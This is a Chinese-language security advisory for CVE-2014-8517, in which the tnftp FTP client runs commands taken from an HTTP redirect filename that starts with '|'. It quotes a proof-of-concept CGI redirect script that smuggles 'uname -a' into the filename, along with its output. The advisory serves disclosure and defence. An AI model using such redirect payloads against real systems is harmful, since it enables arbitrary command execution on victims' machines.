tnftp ftp客户端任意命令执行漏洞(CVE-2014-8517)

tnftp ftp客户端任意命令执行漏洞(CVE-2014-8517)

发布日期：2014-10-29
更新日期：2014-10-30

受影响系统：
NetBSD tnftp
描述：
CVE(CAN) ID: CVE-2014-8517

 tnftp是广泛使用的NetBSD FTP客户端。

tnftp存在安全漏洞导致攻击者可以执行任意命令。此漏洞影响多个版本Linux(Fedora, Debian, NetBSD, FreeBSD, OpenBSD)及Apple Yosemite 10.10。

 受害者使用"ftp http://server/path/file.txt"命令，而没有使用"-o"参数来指定输出文件时，恶意服务器可以通过tnftp来执行任意命令。

<*来源：Jared Mcneill
  *>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Jared Mcneill （）提供了如下测试方法：

  If you do "ftp http://server/path/file.txt"; and don't specify an output
    filename with -o, the ftp program can be tricked into executing
    arbitrary commands.

    The FTP client will follow HTTP redirects, and uses the part of the
    path after the last / from the last resource it accesses as the output
    filename (as long as -o is not specified).

    After it resolves the output filename, it checks to see if the output
    filename begins with a "|", and if so, passes the rest to
    popen(3): http://nxr.netbsd.org/xref/src/usr.bin/ftp/fetch.c#1156

    Here's a simple CGI script that causes ftp to execute "uname -a", the
    issue is present on both NetBSD 7.99.1 and OSX 10.10:

      a20$ pwd
      /var/www/cgi-bin
      a20$ ls -l
      total 4
      -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
      -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
      a20$ cat redirect
      #!/bin/sh
      echo 'Status: 302 Found'
      echo 'Content-Type: text/html'
      echo 'Connection: keep-alive'
      echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
      echo
      a20$
    a20$ ftp http://localhost/cgi-bin/redirect
    Trying ::1:80 ...
    ftp: Can't connect to `::1:80': Connection refused
    Trying 127.0.0.1:80 ...
    Requesting http://localhost/cgi-bin/redirect
    Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
    Requesting http://192.168.2.19/cgi-bin/|uname%20-a
        32      101.46 KiB/s
    32 bytes retrieved in 00:00 (78.51 KiB/s)
    NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
    ADT 2014
    Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
    BOARD evbarm
    a20$

建议：
厂商补丁：

NetBSD
 ------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://ftp.netbsd.org/pub/pkgsrc/current/pkgsrc/net/tnftp/README.html

参考：
http://seclists.org/oss-sec/2014/q4/459
http://seclists.org/oss-sec/2014/q4/459
http://seclists.org/oss-sec/2014/q4/460
http://netbsd.org/

本文永久更新链接地址：